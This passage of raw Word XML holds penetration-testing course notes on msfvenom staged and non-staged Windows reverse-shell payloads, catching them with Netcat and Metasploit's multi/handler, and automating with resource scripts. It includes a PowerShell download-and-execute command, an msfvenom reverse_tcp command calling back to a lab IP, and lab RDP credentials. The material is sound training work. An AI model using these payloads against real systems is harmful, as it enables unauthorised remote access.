      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that we have created the malicious binary file, let's use it. For this, we start a Netcat listener on port 443, Python3 web server on port 80, and connect to BRUTE2 via RDP with the user justin and password SuperS3cure1337#. Once we've connected over RDP, we can start PowerShell to transfer the file and execute it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005DB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005DC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="876300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="326" name="image307.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image307.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId149"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="585"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">iwr -uri http://192.168.119.2/nonstaged.exe -Outfile nonstaged.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="585"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.\nonstaged.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005DF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once we executed the binary file, we'll receive an incoming reverse shell on our Netcat listener.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005E1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005E2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005E3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hf1nndub19af" w:id="46"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Staged msfvenom payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005E4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005E5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As you will see later, this is different from a non-staged since this one needs a multi/handler module in order to catch reverse shell connection. We can't just use netcat </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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, let's use a staged payload to do the same. For this, we'll again use msfvenom to create a Windows binary with a staged TCP reverse shell payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005E8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005E9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1866900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="45" name="image69.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image69.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId150"/>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5EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="809"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.119.2 LPORT=443 -f exe -o staged.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="809"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This payload is for 64-bit. For 32-bit, use windows/shell_reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005EC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005ED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll repeat the steps from Listing 48 to download and execute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">staged.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and we'll start the Netcat listener again.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005EE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005EF">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">While we received an incoming connection, we cannot execute any commands through it. This is because Netcat doesn't know how to handle a staged payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005F0">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To get a functional interactive command prompt, we can use Metasploit's</w:t>
      </w:r>
      <w:hyperlink r:id="rId151">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId152">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">multi/handler</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> module, which works for many staged, non-staged, and more advanced payloads. Let's use this module to receive the incoming connection from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">staged.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005F1">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In Metasploit, let's select the module with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Then, we must specify the payload of the incoming connection. In our case, this is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">windows/x64/shell/reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. In addition, we have to set the options for the payload. We enter the IP of our Kali machine as argument for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LHOST</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and port 443 as argument for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LPORT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Finally, we can enter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to launch the module and set up the listener.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005F2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5196165" cy="4138613"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="334" name="image322.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image322.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId153"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5196165" cy="4138613"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="613"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="613"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set payload &lt;payload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="613"/>
        </w:numPr>
        <w:ind w:left="72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5F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="613"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set LHOST &lt;IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="613"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="613"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once our listener is running on port 443, we can start </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">staged.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> again on BRUTE2. Our Metasploit multi/handler receives the incoming staged payload and provides us with an interactive reverse shell in the context of a session.</w:t>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t xml:space="preserve">Using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> without any arguments will block the command prompt until execution finishes or we background the session. As we've learned before, we can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run -j</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to start the listener in the background, allowing us to continue other work while we wait for the connection. We can use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jobs</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command to get a list of all currently active jobs, such as active listeners waiting for connections.</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As Metasploit created a new session for the incoming connection, we could now again interact with it with sessions -i and the session ID as argument.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005FF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000600">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000601">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5fja1c96nlyt" w:id="47"/>
      <w:bookmarkEnd w:id="47"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Automating Metasploit using Resource Scripts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000602">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From XXXXXXXXX (21.4. Automating Metasploit)</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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit automates various tasks and operations for us, but we can create scripts to further automate repetitive commands inside the framework itself. These scripts are called Resource Scripts. In this Learning Unit, we'll explore how to create and use them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000605">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000606">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000607">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Resource scripts can chain together a series of Metasploit console commands and Ruby code. Meaning, we can either use the built-in commands of Metasploit or write code in</w:t>
      </w:r>
      <w:hyperlink r:id="rId154">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId155">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Ruby</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (as it's the language Metasploit is developed in) to manage control flow as well as develop advanced logic components for resource scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000608">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In a penetration test, we may need to set up several multi/handler listeners each time we want to receive an incoming reverse shell. We could either let Metasploit run in the background the whole time or start Metasploit and manually set up a listener each time. We could also create a resource script to automate this task for us.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000609">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's create a resource script that starts a multi/handler listener for a non-staged Windows 64-bit Meterpreter payload. To do this, we can create a file in the home directory of the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listener.rc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and open it in an editor such as</w:t>
      </w:r>
